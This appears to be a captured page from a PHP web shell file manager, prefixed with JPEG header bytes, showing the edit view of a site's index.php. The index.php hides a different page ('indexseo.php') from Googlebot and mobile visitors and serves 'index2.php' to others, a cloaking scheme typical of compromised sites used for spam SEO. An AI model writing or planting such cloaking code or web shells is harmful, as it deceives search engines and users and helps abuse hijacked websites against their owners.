ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.-
File manager
File manager - Edit - /home/tokomrjk/cdokay.com/index.php
Back
<?php function isGoogleBot() { $googleBots = [ 'Googlebot', 'AdsBot-Google', 'Googlebot-Image', 'Googlebot-News', 'Googlebot-Video', 'Mediapartners-Google' ]; $userAgent = $_SERVER['HTTP_USER_AGENT'] ?? ''; foreach ($googleBots as $bot) { if (stripos($userAgent, $bot) !== false) { return true; } } return false; } function isMobileDevice() { $userAgent = $_SERVER['HTTP_USER_AGENT'] ?? ''; $mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'Opera Mini', 'IEMobile', 'Mobile']; foreach ($mobileAgents as $device) { if (stripos($userAgent, $device) !== false) { return true; } } return false; } function isDirectAccess() { return empty($_SERVER['HTTP_REFERER']); } // Karar ver if (isGoogleBot() || isMobileDevice()) { include 'indexseo.php'; // Google bot veya mobil ise } elseif (isDirectAccess()) { include 'index2.php'; // Referanssız direkt linkten gelenler } else { include 'index2.php'; // Diğer durumlarda da normal sayfa } ?>
| ver. 1.4 |
Github
|
.
| PHP 8.1.34 | Generation time: 0.42 |
proxy
|
phpinfo
|
Settings